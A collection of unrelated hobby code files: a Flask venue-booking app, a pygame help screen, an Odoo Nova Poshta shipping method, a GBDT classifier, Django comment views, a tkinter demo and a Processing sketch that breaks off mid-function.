Artist.query.all()\n tmp = [a.todict_shows() for a in artists]\n data = tmp\n return render_template('pages/artists.html', artists=data)\n\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n search_term = request.form.get('search_term')\n artist = Artist.query.filter(\n Artist.name.ilike(\"%{}%\".format(search_term))).all()\n count_venues = len(artist)\n datum = [a.to_dict() for a in artist]\n response = {\n \"count\": count_venues,\n \"data\": datum\n }\n return render_template('pages/search_artists.html', results=response,\n search_term=request.form.get('search_term', None))\n\n\n@app.route('/artists/<int:artist_id>')\ndef show_artist(artist_id):\n artist = Artist.query.get(artist_id)\n data = artist.todict_shows()\n return render_template('pages/show_artist.html', artist=data)\n\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists/<int:artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n form = ArtistForm()\n artist = Artist.query.get(artist_id)\n\n if artist:\n form.name.data = artist.name\n form.city.data = artist.city\n form.state.data = artist.state\n form.phone.data = artist.phone\n form.genres.data = artist.genres\n form.facebook_link.data = artist.facebook_link\n form.image_link.data = artist.image_link\n form.website.data = artist.website\n form.seeking_venue.data = artist.seeking_venue\n form.seeking_description.data = artist.seeking_description\n\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n\n@app.route('/artists/<int:artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n error = False\n artist = Artist.query.get(artist_id)\n\n try:\n artist.name = request.form['name']\n artist.city = request.form['city']\n artist.state = request.form['state']\n artist.phone = request.form['phone']\n artist.genres = request.form.getlist('genres')\n artist.image_link = request.form['image_link']\n artist.facebook_link = request.form['facebook_link']\n artist.website = request.form['website']\n artist.seeking_venue = True if 'seeking_venue' in request.form else False\n artist.seeking_description = request.form['seeking_description']\n\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n\n 
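    # the error flag (rather than re-raising) lets the view flash a message and
    # still fall through to the redirect, mirroring the other handlers in this module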
if error:\n flash('Artist could not be changed.')\n if not error:\n flash('Artist was successfully updated!')\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n\n@app.route('/venues/<int:venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n form = VenueForm()\n venue = Venue.query.get(venue_id)\n\n if venue:\n form.name.data = venue.name\n form.city.data = venue.city\n form.state.data = venue.state\n form.phone.data = venue.phone\n form.genres.data = venue.genres\n form.facebook_link.data = venue.facebook_link\n form.image_link.data = venue.image_link\n form.website.data = venue.website\n form.seeking_talent.data = venue.seeking_talent\n form.seeking_description.data = venue.seeking_description\n\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n\n@app.route('/venues/<int:venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n error = False\n venue = Venue.query.get(venue_id)\n\n try:\n venue.name = request.form['name']\n venue.city = request.form['city']\n venue.state = request.form['state']\n venue.phone = request.form['phone']\n venue.genres = request.form.getlist('genres')\n venue.image_link = request.form['image_link']\n venue.facebook_link = request.form['facebook_link']\n venue.website = request.form['website']\n venue.seeking_talent = True if 'seeking_talent' in request.form else False\n venue.seeking_description = request.form['seeking_description']\n\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n\n if error:\n flash('venue could not be changed.')\n if not error:\n flash('venue was successfully updated!')\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n\n# Create Artist\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n error = False\n artist = Artist()\n try:\n artist.name = request.form['name']\n artist.city = request.form['city']\n artist.state = request.form['state']\n artist.phone = request.form['phone'],\n artist.facebook_link = request.form['facebook_link'],\n artist.genres = request.form.getlist('genres'),\n artist.image_link = request.form['image_link']\n artist.website = request.form['website']\n artist.seeking_venue = True if 'seeking_venue' in request.form else False\n artist.seeking_description = request.form['seeking_description']\n db.session.add(artist)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n if error:\n flash('An error ' + request.form['name'] + ' could not be listed.')\n if not error:\n flash(request.form['name'] + ' was successfully added!')\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n\n@app.route('/shows')\ndef shows():\n shows_query = db.session.query(Show).join(Artist).join(Venue).all()\n\n data = []\n for show in shows_query:\n data.append({\n \"artist_id\": show.artist_id,\n \"artist_name\": show.artist.name,\n \"artist_image_link\": show.artist.image_link,\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"start_time\": show.start_time.strftime('%Y-%m-%d %H:%M:%S')\n })\n\n return render_template('pages/shows.html', shows=data)\n\n\n@app.route('/shows/create')\ndef create_shows():\n form = ShowForm()\n return render_template('forms/new_show.html', 
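                           # pass the WTForms ShowForm instance so the template can render its fields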
form=form)\n\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n error = False\n try:\n show = Show()\n show.artist_id = request.form['artist_id']\n show.venue_id = request.form['venue_id']\n show.start_time = request.form['start_time']\n db.session.add(show)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n\n if error:\n flash('An error occurred.')\n else:\n flash(' show was successfully added')\n return render_template('pages/home.html')\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n# ----------------------------------------------------------------------------#\n# Launch.\n# ----------------------------------------------------------------------------#\n\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 8080))\n app.run(host='0.0.0.0', port=port)\n","repo_name":"AmmarMousa17/Fyyur","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32362417607","text":"import pygame\r\nfrom colors import *\r\n\r\n# display how to use pane\r\ndef how_to_use(width):\r\n TEXTSPACING = 20\r\n HEADERSPACING = 25\r\n PARAGRAPHSPACING = 10\r\n display_surface = pygame.display.set_mode((width, width))\r\n pygame.display.set_caption('How To')\r\n\r\n header1 = make_header(\"Setting Points\")\r\n header2 = make_header(\"Setting Algorithm\")\r\n header3 = make_header(\"Reset\")\r\n header4 = make_header(\"Execute\")\r\n header5 = make_header(\"How To Read Results\")\r\n header6 = make_header(\"Back To Menu\")\r\n\r\n text1 = make_text(\"Choose the points you would like to add using the up and down keys. The current\")\r\n text2 = make_text(\"choice of points is displayed in the bottom left corner. The orange point is start\")\r\n text3 = make_text(\"point, the turqouise point is the end point and the black points are wall points.\")\r\n text4 = make_text(\"There can only be 1 start and 1 end point. If another start or end point is added \")\r\n text5 = make_text(\"it will remove the other start or end point respectively.\")\r\n\r\n text6 = make_text(\"Choose the algorithm to find the path using the left and right keys. The current\")\r\n text7 = make_text(\"chosen algorithm is displayed in the bottom right corner.\")\r\n\r\n text8 = make_text(\"To reset the grid, press the 'c' key.\")\r\n\r\n text9 = make_text(\"To execute the algorithm, press the space key. Once completed the path length\")\r\n text10 = make_text(\"will be displayed in the top right corner. 
No changes can be made to the grid\")\r\n text11 = make_text(\"once the program is executed until the board is reset.\")\r\n\r\n text12 = make_text(\"Once executed the points that have been checked will be colored in red, then\")\r\n text13 = make_text(\"when the end point is found, the path will be colored in purple.\")\r\n\r\n text14 = make_text(\"To go back to the menu, press the 'c' key.\")\r\n\r\n while True:\r\n display_surface.fill(WHITE)\r\n i = 0\r\n j = 0\r\n display_surface.blit(header1, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text1, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text2, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text3, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text4, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text5, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header2, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text6, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text7, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header3, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text8, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header4, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text9, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text10, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text11, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header5, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text12, (i,j))\r\n j+=TEXTSPACING\r\n display_surface.blit(text13, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n\r\n display_surface.blit(header6, (i,j))\r\n j+=HEADERSPACING\r\n display_surface.blit(text14, (i,j))\r\n j+=TEXTSPACING+PARAGRAPHSPACING\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_c:\r\n pygame.display.set_caption(\"Menu\")\r\n return\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n pygame.display.update()\r\n#create text from parameter in the header font\r\ndef make_header(text):\r\n header_font = pygame.font.Font('freesansbold.ttf', 20)\r\n return header_font.render(text, True, BLACK, WHITE)\r\n# create text from parameter in regular text font\r\ndef make_text(text):\r\n text_font = pygame.font.SysFont('timesnewroman',15)\r\n return text_font.render(text, True, BLACK, WHITE)","repo_name":"JustinWhalley-Carleton/Path_Finding_Algorithms","sub_path":"how_to_use.py","file_name":"how_to_use.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35917112658","text":"from odoo import _, fields, models\nfrom odoo.exceptions import UserError\n\n\nclass ProviderNP(models.Model):\n _inherit = \"delivery.carrier\"\n\n def np_send_shipping(self, pickings):\n for picking in pickings:\n error_messages = []\n error = False\n\n if picking.cost == 0:\n error_messages.append(_(\"Cost not specified\"))\n error = True\n\n if picking.np_shipping_weight == 0:\n error_messages.append(_(\"Shipping weight not specified\"))\n error = True\n\n if picking.np_shipping_volume == 0:\n error_messages.append(_(\"Shipping volume not specified\"))\n error = True\n\n if not picking.biko_recipient_id:\n error_messages.append(_(\"Recipient person not specified\"))\n error = True\n elif not picking.biko_recipient_id.mobile:\n error_messages.append(_(\"Recipient person mobile not specified\"))\n error = True\n\n if error:\n raise 
UserError(\"\\n\".join(error_messages))\n\n data = {\n \"name\": picking.sale_id.name,\n \"order_to_deliver\": picking.sale_id.id,\n \"salesperson\": picking.sale_id.user_id.id,\n \"payer_type\": picking.payer_type.id or self.np_payer_type.id,\n \"payment_method\": picking.payment_method.id\n or self.np_payment_method.id,\n \"cargo_type\": picking.cargo_type.id or self.np_cargo_type.id,\n \"city_sender\": picking.sender_city.id or self.np_city_sender.id,\n \"sender_warehouse\": picking.sender_warehouse.id\n or self.np_sender_warehouse.id,\n \"contact_sender\": self.np_contact_sender.id,\n \"service_type\": picking.service_type.id or self.np_service_type.id,\n \"datetime\": picking.scheduled_date,\n \"seats_amount\": picking.seats_amount,\n \"recipient_city\": picking.recipient_city.id\n or picking.sale_id.partner_shipping_id.np_city.id,\n \"cost\": picking.cost,\n \"weight\": picking.np_shipping_weight,\n \"np_length\": picking.np_length,\n \"np_width\": picking.np_width,\n \"np_height\": picking.np_height,\n \"general_volume\": picking.np_shipping_volume,\n \"recipient_id\": picking.biko_recipient_id.id,\n \"biko_dropshipping\": picking.biko_dropshipping,\n }\n if picking.backward_money:\n data.update(\n {\n \"backward_money\": picking.backward_money,\n \"bm_payer_type\": picking.bm_payer_type.id,\n \"backward_money_costs\": picking.backward_money_costs,\n }\n )\n if picking.afterpayment_check:\n data.update(\n {\n \"afterpayment_check\": picking.afterpayment_check,\n \"backward_money_costs\": picking.backward_money_costs,\n }\n )\n\n service_type = (\n self.env[\"delivery_novaposhta.service_types\"]\n .browse(data[\"service_type\"])\n .ref\n )\n if service_type in [\n \"DoorsDoors\",\n \"WarehouseDoors\",\n ]:\n data.update(\n {\n \"recipient_house\": picking.recipient_house\n or picking.sale_id.partner_shipping_id.house,\n \"recipient_flat\": picking.recipient_flat\n or picking.sale_id.partner_shipping_id.flat,\n \"streets\": picking.streets.id\n or picking.sale_id.partner_shipping_id.np_street.id,\n }\n )\n else:\n data.update(\n {\n \"recipient_warehouse\": picking.recipient_warehouse.id\n or picking.sale_id.partner_shipping_id.np_warehouse.id,\n }\n )\n if self.notification:\n ttn = (\n self.env[\"delivery_novaposhta.ttn\"]\n .with_context(autocreate=True)\n .create(data)\n )\n\n else:\n ttn = (\n self.env[\"delivery_novaposhta.ttn\"]\n .with_context(autocreate=True, notif=True)\n .create(data)\n )\n if ttn:\n if \"\" in self.np_payer_type.ref == \"Sender\":\n np_partner = self.env.ref(\"novaposhta_data.np_partner\")\n np_product = self.env.ref(\n \"novaposhta_data.product_product_delivery_np\"\n )\n if np_partner and np_product:\n invoice_data = {\n \"name\": \"\",\n \"move_type\": \"in_invoice\",\n \"partner_id\": np_partner.id,\n \"invoice_date\": fields.Datetime.now(),\n \"invoice_line_ids\": [\n (\n 0,\n 0,\n {\n \"name\": np_product.name,\n \"product_id\": np_product.id,\n \"quantity\": 1,\n \"product_uom_id\": np_product.uom_id.id,\n \"price_unit\": ttn.estimated_costs,\n \"analytic_account_id\": picking.sale_id.analytic_account_id.id,\n \"account_id\": np_partner.property_account_receivable_id.id,\n },\n )\n ],\n \"currency_id\": self.env.ref(\"base.UAH\").id,\n }\n picking.invoice_id = self.env[\"account.move\"].create(\n invoice_data\n )\n picking.ttn = ttn\n res = []\n cost = ttn.estimated_costs\n shipping_data = {\"exact_price\": cost, \"tracking_number\": ttn.doc_number}\n res += [shipping_data]\n else:\n shipping_data = {\n \"exact_price\": 101.0,\n \"tracking_number\": 
20450090830943,\n }\n res += [shipping_data]\n return res\n","repo_name":"BorovlevAS/muztorg","sub_path":"biko_np_patch/models/delivery_carrier.py","file_name":"delivery_carrier.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27171685943","text":"# -*- coding: utf-8 -*-\r\nfrom data import *\r\nfrom CART_regression_tree import *\r\nimport numpy as np\r\nimport random\r\n\r\nclass GBDT:\r\n\tdef __init__(self):\r\n\t\tself.maxIter = 3\r\n\t\tself.maxDepth = 10\r\n\t\tself.treesList = None\r\n\r\n\tdef initialize(self, data, idSet, Type):\r\n\t\tif Type == 'multi_classification':\r\n\t\t\t#初始化f, p, residual, c, y\r\n\t\t\tself.treesList = []\r\n\t\t\tf = {}\r\n\t\t\tresidual = {}\r\n\t\t\ty = {}\r\n\t\t\tprob = {}\r\n\t\t\tc = {}\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tf[k] = {}\r\n\t\t\t\tresidual[k] = {}\r\n\t\t\t\ty[k] = {}\r\n\t\t\t\tprob[k] = {}\r\n\t\t\t\tc[k] = {}\r\n\t\t\t\tfor Id in idSet:\r\n\t\t\t\t\tf[k][Id] = 0.\r\n\t\t\t\t\ty[k][Id] = 1. if data.getLabel(Id) == k else 0.\r\n\t\t\t\t\tc[k][Id] = 0.\r\n\t\t\tprob = self.caculate_prob_Multi(data, idSet, f, prob)\r\n\t\t\tresidual = self.caculate_residual_Multi(data, idSet, prob, y, residual)\r\n\t\t\treturn f, residual, y, prob, c\r\n\t\telif Type == 'binary_classification':\r\n\t\t\t#初始化y, f, residual, c\r\n\t\t\tself.treesList = []\r\n\t\t\tf = {}\r\n\t\t\tresidual = {}\r\n\t\t\tc = {}\r\n\t\t\ty = {}\r\n\t\t\tfor Id in idSet:\r\n\t\t\t\tf[Id] = 0.\r\n\t\t\t\tc[Id] = 0.\r\n\t\t\t\tif data.getLabel(Id)%2 == 0:\r\n\t\t\t\t\t#偶数为正类,奇数为负类\r\n\t\t\t\t\ty[Id] = 1\r\n\t\t\t\telse:\r\n\t\t\t\t\ty[Id] = -1\r\n\t\t\tresidual = self.caculate_residual_Binary(idSet, y, f, residual)\r\n\t\t\treturn f, residual, c, y\r\n\r\n\t\telif Type == 'regression':\r\n\t\t\t#初始化y, residual, c\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tprint('输出参数有误')\r\n\t\t\treturn\r\n\t#以下区域计算binary的更新函数\r\n\tdef caculate_residual_Binary(self, idSet, y, f, residual):\r\n\t\tfor Id in idSet:\r\n\t\t\tresidual[Id] = y[Id]/(1. 
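			# negative gradient of the logistic loss log(1 + exp(-y*f)) for y in {-1, +1}:
			# dL/df = -y / (1 + exp(y*f)), so the residual to fit is y / (1 + exp(y*f))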
+ np.exp(y[Id]*f[Id]))\r\n\t\treturn residual\r\n\r\n\tdef caculate_c_Binary(self, leafList, residual, c):\r\n\t\tfor node in leafList:\r\n\t\t\tfor Id in node.idSet:\r\n\t\t\t\tc[Id] = node.predictValue\r\n\t\treturn c\r\n\r\n\tdef update_f_Binary(self, idSet, c, f):\r\n\t\tfor Id in idSet:\r\n\t\t\tf[Id] += c[Id]\r\n\t\treturn f\r\n\r\n\tdef binary_classification(self, data, idSet):\r\n\t\tf, residual, c, y= self.initialize(data, idSet, 'binary_classification')\r\n\t\tt = 0\r\n\t\tfeatSet = data.featSet\r\n\t\tdepth = self.maxDepth\r\n\t\twhile True:\r\n\t\t\tif t >= self.maxIter:\r\n\t\t\t\tprint('到达迭代次数上限终止')\r\n\t\t\t\treturn\r\n\t\t\tprint('******************************************************************现在开始建立第' + str(t) + '棵树')\r\n\t\t\ttree = CART()\r\n\t\t\ttree.root = tree.constructTree(data, idSet, featSet, depth, residual, Type = 'binary_classification')\r\n\t\t\tself.treesList.append(tree)\r\n\t\t\tc = self.caculate_c_Binary(tree.leafList, residual, c)\r\n\t\t\tf = self.update_f_Binary(idSet, c, f)\r\n\t\t\tresidual = self.caculate_residual_Binary(idSet, y, f, residual)\r\n\t\t\tself.precision_binary(idSet, f, y)\r\n\t\t\tt += 1\r\n\r\n\tdef precision_binary(self, idSet, f, y):\r\n\t\tcount = 0.\r\n\t\tfor Id in idSet:\r\n\t\t\tif f[Id]*y[Id] > 0:\r\n\t\t\t\tcount += 1\r\n\t\tprint('**********************************************************本次预测准确率为:' + str(round(count/len(idSet)*100, 2)) + '%')\r\n\t#以下区域计算multi_classification的更新和预测\r\n\tdef caculate_prob_Multi(self, data, idSet, f, prob):\r\n\t\tfor Id in idSet:\r\n\t\t\tsums = 0.\r\n\t\t\tmaxK = 0\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tif f[k][Id] > f[maxK][Id]:\r\n\t\t\t\t\tmaxK = k\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tsums += np.exp(f[k][Id] - f[maxK][Id])\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tprob[k][Id] = np.exp(f[k][Id] - f[maxK][Id])/sums\r\n\t\treturn prob\r\n\tdef caculate_residual_Multi(self, data, idSet, prob, y, residual):\r\n\t\tfor Id in idSet:\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tresidual[k][Id] = y[k][Id] - prob[k][Id]\r\n\t\treturn residual\r\n\r\n\tdef caculate_c_Multi(self, leafList, c, k):\r\n\t\tfor node in leafList:\r\n\t\t\tfor Id in node.idSet:\r\n\t\t\t\tc[k][Id] = node.predictValue\r\n\t\treturn c\r\n\tdef update_f_Multi(self, data, idSet, f, c):\r\n\t\tfor k in range(0, data.K):\r\n\t\t\tfor Id in idSet:\r\n\t\t\t\tf[k][Id] += c[k][Id]\r\n\t\treturn f\r\n\tdef multi_classification(self, data, idSet):\r\n\t\tf, residual, y, prob, c = self.initialize(data, idSet, Type = 'multi_classification')\r\n\t\tt = 0\r\n\t\tdepth = self.maxDepth\r\n\t\tfeatSet = data.featSet\r\n\t\twhile True:\r\n\t\t\tif t >= self.maxIter:\r\n\t\t\t\tprint('到达迭代次数上限终止')\r\n\t\t\t\treturn\r\n\t\t\tprint('**************************************************************************************************************现在开始建立第' + str(t) + '棵树')\r\n\t\t\ttrees = {}\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tprint('*******************************************************************现在开始建立第' + str(k) + '棵小树苗')\r\n\t\t\t\ttree = CART()\r\n\t\t\t\ttree.root = tree.constructTree(data, idSet, featSet, depth, residual[k], Type = 'multi_classification')\r\n\t\t\t\ttrees[k] = tree\r\n\t\t\t\tc = self.caculate_c_Multi(tree.leafList, c, k)\r\n\t\t\tself.treesList.append(trees)\r\n\t\t\tf = self.update_f_Multi(data, idSet, f, c)\r\n\t\t\tprob = self.caculate_prob_Multi(data, idSet, f, prob)\r\n\t\t\tresidual = self.caculate_residual_Multi(data, idSet, prob, y, residual)\r\n\t\t\tself.precision_Multi(data, 
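			# report training-set accuracy after each boosting round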
idSet, f)\r\n\r\n\t\t\tt += 1\r\n\r\n\tdef precision_Multi(self, data, idSet, f):\r\n\t\tcount = 0.\r\n\t\tfor Id in idSet:\r\n\t\t\tpredictLabel = 0.\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tif f[k][Id] > f[predictLabel][Id]:\r\n\t\t\t\t\tpredictLabel = k\r\n\t\t\tif predictLabel == data.getLabel(Id):\r\n\t\t\t\tcount += 1\r\n\t\t\telse:\r\n\t\t\t\tprint('样本' + str(Id) + '真实的label为:' + str(data.getLabel(Id)) + ' ' + '错误估计为:' + str(predictLabel))\r\n\t\tprint('******************************************************************************************************************本次预测准确率为:' + str(round(count/len(idSet)*100, 2)) + '%')\r\n\r\n\tdef getPredict_Multi(self, data, Id):\r\n\t\tscore = {}\r\n\t\tfor trees in self.treesList:\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tscore[k] = score.get(k, 0) + trees[k].getPredict(data, Id, trees[k].root)\r\n\t\tbestK = 0\r\n\t\tfor k in range(0, data.K):\r\n\t\t\tif score[k] > score[bestK]:\r\n\t\t\t\tbestK = k\r\n\t\treturn bestK\r\n\r\n\tdef precisionTest(self, data, idSetTest):\r\n\t\tcount = 1.\r\n\t\tfor Id in idSetTest:\r\n\t\t\tif self.getPredict_Multi(data, Id) == data.getLabel(Id):\r\n\t\t\t\tcount += 1\r\n\t\tprint('***********************************************************************************************************************测试集上的准确率为:' + str(round(count/len(idSetTest)*100, 2)) + '%')\r\n\r\nmodel = GBDT()\r\ndata = Data()\r\nidSet = random.sample(range(0, 50000), 2000)\r\nmodel.multi_classification(data, idSet)\r\nidSetTest = random.sample(range(0, 50000), 200)\r\nmodel.precisionTest(data, idSetTest)\r\n\r\n\r\n\t\t\r\n\r\n","repo_name":"ashu233/GBDT","sub_path":"GBDT.py","file_name":"GBDT.py","file_ext":"py","file_size_in_byte":6320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9244998704","text":"print('AAACCCCCC')\n\nmy_list=[10,20,30,10,[10,56,89,75,10,56,10],56,10,89,48]\nx=1\nprint('adadassdfdsssssssssss')\nfor num in my_list:\n if num==10:\n my_list.remove(num)\n elif x==1:\n print(\"vishnu\")\n elif type(num) == list:\n print(\"vikrant\")\n TenCount = num.count(10)\n print(TenCount)\n for item in range(TenCount):\n num.remove(10)\nprint(my_list)\n\n# C:\\Users\\Admin\\PycharmProjects\\Demo\\11_04_19_ListTypes_List_Tuple_Set_Dict_Methods.py\n'''\nmy_list=[10,20,30,10,[10,56],56,10,89,48]\nmy_list1=[]\nfor num in my_list:\n if num != 10:\n my_list1.append(num)\n elif type(num) == list:\n print(\"vikrant\")\n for item in num:\n if item == 10:\n num.remove(item)\n print(num)\n my_list1.append(num)\n #print(TenCount)\n\nprint(my_list1)\n\nlistOfItems1=[10,10,30,[10,0,20],10,58,10,10]\n\nfor outerItem in listOfItems1:\n if type(outerItem)==list:\n innerList = outerItem\n for innerItem in innerList:\n if innerItem==10:\n innerList.remove(innerItem)\n elif outerItem==10:\n listOfItems1.remove(outerItem)\nprint(listOfItems1)\n\n\n\n'''\n\n","repo_name":"Vishnuworld/Demo","sub_path":"New folder/AAAAA.py","file_name":"AAAAA.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73724569448","text":"from django.contrib import messages\nfrom django.shortcuts import redirect, render\nfrom filme.models import Filme\n\nfrom .forms import *\nfrom .models import *\n\n\ndef addComentario(request, movie_id):\n if request.user.is_authenticated:\n movie = Filme.objects.get(pk=movie_id)\n \n if request.method == 'POST':\n form = ComentarioForm(request.POST or None)\n \n if 
form.is_valid():\n data = form.save(commit=False)\n data.comentario = request.POST['comentario']\n data.nota = request.POST['nota']\n data.user = request.user\n data.filme = movie\n data.save()\n \n if len(data.comentario) < 5:\n messages.add_message(\n request,\n messages.ERROR,\n f\"Comentário NÃO foi adicionado. O comentário deve ter no mínimo 5 caracteres.\"\n )\n return redirect('filmes:detail', movie_id) \n \n messages.add_message(\n request,\n messages.SUCCESS,\n f\"Comentário enviado com sucesso.\"\n )\n return redirect('filmes:detail', movie_id)\n else:\n messages.add_message(\n request,\n messages.ERROR,\n f\"Comentário NÃO foi adicionado.\"\n )\n return redirect('filmes:detail', movie_id)\n else:\n form = ComentarioForm()\n \n context = {'form': form}\n return render(request, 'filme/filme_detalhes.html', context)\n else:\n return redirect('perfil:login') \n\n\ndef editComentario(request, movie_id, comentario_id):\n if request.user.is_authenticated:\n try:\n user_comentario = Comentario.objects.get(filme=movie_id, pk=comentario_id)\n except:\n return render(request, 'comentario/erro.html')\n \n if request.user == user_comentario.user:\n if request.method == 'POST':\n form = ComentarioForm(request.POST or None, instance=user_comentario)\n \n if form.is_valid():\n data = form.save(commit=False)\n \n if (data.nota > 10) or (data.nota < 0):\n error = 'Valor de nota inválido. Favor escolher entre 0 e 10.'\n context = {\n 'error': error,\n 'form': form\n }\n messages.add_message(\n request,\n messages.ERROR,\n f\"Não foi possível salvar o comentário editado.\"\n )\n return render(request, 'comentario/editComentario.html', context)\n else:\n data.save()\n messages.add_message(\n request,\n messages.SUCCESS,\n f\"Comentáro foi editado com sucesso.\"\n )\n return redirect('filmes:detail', movie_id) \n else:\n form = ComentarioForm(instance=user_comentario)\n \n context = {'form': form}\n return render(request, 'comentario/editComentario.html', context)\n else:\n return redirect('filmes:detail', movie_id)\n else: \n return redirect('perfil:login')\n \n\ndef deleteComentario(request, movie_id, comentario_id):\n if request.user.is_authenticated:\n try:\n comentario = Comentario.objects.get(filme=movie_id, pk=comentario_id)\n except:\n return render(request, 'comentario/erro.html')\n \n if request.user == comentario.user:\n comentario.delete()\n messages.add_message(\n request,\n messages.SUCCESS,\n f\"Comentáro foi excluído com sucesso.\"\n )\n else:\n return redirect('filmes:detail', movie_id)\n return redirect('filmes:detail', movie_id)\n","repo_name":"EduardoBran/EbFilmes-App-Web-Py","sub_path":"comentario/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36992060829","text":"from tkinter import *\n\n#initializing Tk class OOP(Object-Oriented Programming)\nroot = Tk()\n\n\n#Entry(root) = shows an input field which allows users to enter data\n#We can change its colour and size or features of the input field as the button eg: fg, bg, width, etc\n#.insert(index value, text) = giving a default text/ value into the input field\nentryWid = Entry(root, width = 50, borderwidth = 5)\nentryWid.pack()\nentryWid.insert(0, \"Enter Your Name: \")\n\n#We are able to put variables into the text section\n#.get() allows us to get the input from the user entry widget\ndef myClick():\n myLabel = Label(root, text = f\"Hello, {entryWid.get()}\")\n 
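    # a fresh Label is created on every click; pack() stacks it under the earlier widgets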
myLabel.pack()\n\n#Button(root, text) = having a button for user to click\n#state = DISABLED = wont allow user to click the button, but it'll still show the button\n#padx = num = controlling the x-axis(width size) of the button\n#pady = num = controlling the y-axis(length size) of the button\n#command = func = letting the button to do something\n#fg = \"colour\" = changing the text colour\n#bg = \"colour\" = changing the button background color\nmyButton = Button(root, text = \"Enter you name\", padx = 50, pady = 50, fg = \"Blue\", bg = \"light green\", command = myClick)\nmyButton.pack()\n\n#Tkinter loop func\nroot.mainloop()","repo_name":"cheokjw/Pytkinter-study","sub_path":"tkinter/Codes/tk entrywid.py","file_name":"tk entrywid.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30837346253","text":"import time\n\nlastX = 0\nlastY = 0\nsquareSize = 2\nsizeIncrementBy = 5\nrotDeg = 0 #in degrees\ndegIncrementBy = 4\ntableDiam = 400\ntableRadius = tableDiam/2\nscreenSize = tableDiam+50\ncenterScreen = screenSize/2\nendProgram = False\niterations = 45\nstate=0\nxys = [(0,0)]\ntest = []\ndef setup():\n size(screenSize*2, screenSize)\n # colorMode(HSB, width, 100, width)\n noStroke()\n background(0)\n \n global test\n test = importGcode(\"helloworld.gcode\") #starTest.gcode #simpleSquareThing\n\ndef draw():\n global state\n if(state==0):\n drawTable()\n state+=1\n elif(state==1):\n global squareSize\n global rotDeg\n global iterations\n # line (100,100,200,200)\n # 